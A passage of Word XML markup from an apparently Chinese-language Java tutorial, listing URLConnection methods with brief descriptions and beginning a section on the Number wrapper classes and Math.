    <w:p w14:paraId="09C9D3F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL getURL()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED48A3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean getUseCaches()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> useCaches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC7F6CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static String guessContentTypeFromName(String fname)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的指定“文件”组件，尝试确定对象的内容类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445378CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static String guessContentTypeFromStream(InputStream is)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据输入流开头的字符，尝试确定输入流的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E2D02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setAllowUserInteraction(boolean allowuserinteraction)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowUserInteraction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F218C14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setConnectTimeout(int timeout)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置打开与此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用的资源的通信链接时使用的指定超时值（以毫秒为单位）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507B9C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static void setContentHandlerFactory(ContentHandlerFactory fac)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ContentHandlerFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ContentHandlerFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146DD677" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static void setDefaultAllowUserInteraction(boolean defaultallowuserinteraction)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将所有将来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowUserInteraction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的默认值设置为指定的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9534B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static void setDefaultRequestProperty(String key, String value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已弃用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在获得适当的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例之后，应该使用实例特定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setRequestProperty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用此方法将不起作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8D49B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setDefaultUseCaches(boolean defaultusecaches)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> useCaches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的默认值设置为指定值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29512F9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setDoInput(boolean doinput)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> doInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>领域本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CA734" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setDoOutput(boolean dooutput)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> doOutput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>领域本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C73175" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static void setFileNameMap(FileNameMap map)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FileNameMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C13EDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setIfModifiedSince(long ifmodifiedsince)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ifModifiedSince</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个领域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到指定值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9519DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setReadTimeout(int timeout)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将读取超时设置为指定的超时时间，以毫秒为单位。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E5057" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setRequestProperty(String key, String value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置一般请求属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112CC24B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void setUseCaches(boolean usecaches)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> useCaches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个领域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到指定值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2682EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String toString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接的表示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4979831B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A787E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="736" w:name="_Toc159780165"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Math</w:t>
      </w:r>
      <w:bookmarkEnd w:id="736"/>
    </w:p>
    <w:p w14:paraId="1714EA95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般地，当需要使用数字的时候，我们通常使用内置数据类型，如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">double </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187804D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int a = 5000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D5942" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>float b = 13.65f;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B360D92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte c = 0x4a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B376A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，在实际开发过程中，我们经常会遇到需要使用对象，而不是内置数据类型的情形。为了解决这个问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言为每一个内置数据类型提供了对应的包装类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DBABA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7453F390" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有的包装类（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Float</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Short</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）都是抽象类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Number </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的子类。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9925" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4405"/>
        <w:gridCol w:w="5520"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="219F33CA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="53B3BE5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>包装类</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
